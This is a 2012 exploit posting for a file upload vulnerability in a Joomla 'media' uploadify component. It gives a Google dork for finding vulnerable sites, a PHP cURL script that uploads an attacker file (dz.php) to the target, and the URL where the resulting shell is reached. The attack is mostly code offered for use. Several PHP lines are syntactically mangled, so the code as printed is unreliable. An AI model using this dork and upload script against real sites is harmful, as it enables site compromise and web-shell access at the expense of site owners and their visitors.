facebook facebook twitter rss

Joomla Components (media) File Upload Vulnerability

Author: HaCker-1420 , Published: 06-07-2012
+-----------------------------------------------------------+
# Exploit Title : Joomla Components "media" File Upload Vulnerability
# Google dork : inurl:media/uploadify/
# Date : 06-07-2012
# Author : HaCker-1420
# Facebook Page : https://www.facebook.com/crackerdz
# Email : belaoudja.mohamed@gmail.com OR k-c0@hotmail.com
# Tested on : Windows Seven Edition Integral / French
+-----------------------------------------------------------+
[~] Exploit/p0c :
<?php
 
$uploadfile
="dz.php";
$ch curl_init("http://domaine.com/media/uploadify/uploadify.php");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS,
array(
'Filedata'=>"@$uploadfile",
'folder'=>'/media/uploadify/'));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);

print 
"$postResult";
?>


Shell Access : http://www.domaine.com/media/uploadify/
+-----------------------------------------------------------+
Great To : L3b - Damane-dz - N4ss!m - B0x - z!4d-Dz - Gastro - Barbaros-Dz - Abu Hamid Madridi - Ben Laden-Dz - Tn_Scorpion - Tunisian spl01t3r - MrWanz & All Muslim Hackers

Like us on Facebook :